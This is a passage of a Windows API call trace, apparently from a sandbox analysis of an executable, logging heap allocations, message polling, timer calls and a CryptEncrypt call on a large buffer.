lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0179.164] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e50c80 [0179.164] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50c80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0179.164] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0179.164] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0179.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0179.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0179.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e54260 [0179.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0179.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0179.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0179.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0179.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0179.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0179.165] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0179.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0179.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0179.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0179.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0179.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0179.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0179.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0179.165] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0179.166] CryptEncrypt (in: hKey=0xa874d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe5d020*, pdwDataLen=0x8cef60*=0xf0c00, dwBufLen=0xf0c08 | out: pbData=0xe5d020*, pdwDataLen=0x8cef60*=0xf0c08) returned 1 [0179.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0179.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0179.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0179.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0179.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0179.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0179.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0179.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0179.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0179.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0179.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0179.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0179.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0179.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0179.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0179.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0179.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0179.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0179.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0179.292] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0179.292] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0179.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0179.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0179.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0179.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0179.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0179.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e699e8 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977908 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0179.293] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0179.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0179.293] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0179.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0179.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0179.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0179.294] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0179.294] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0179.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0179.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0179.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0179.296] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0179.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0179.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0179.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0179.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0179.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0179.355] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e698c8 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977bd8 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0179.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0179.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0179.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0179.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0179.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0xf50020 [0179.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0179.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0179.378] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0179.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0179.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0179.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0179.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0179.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0179.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0179.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0179.379] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0179.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0179.379] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf0c08) returned 0x105c020 [0179.495] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xf50020 | out: hHeap=0x970000) returned 1 [0179.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0179.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0179.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0179.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0179.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0179.500] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0179.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0179.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0179.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0179.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0179.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0179.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0179.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0179.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0179.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0179.501] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0179.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0179.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0179.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0179.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0179.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0179.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0179.501] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0179.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0179.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0179.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0179.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0179.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0179.501] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.501] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0179.502] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0179.502] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0179.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0179.961] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0179.963] TranslateMessage (lpMsg=0x8cf708) returned 0 [0179.963] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0179.963] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0179.963] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0179.964] PeekMessageW (in: 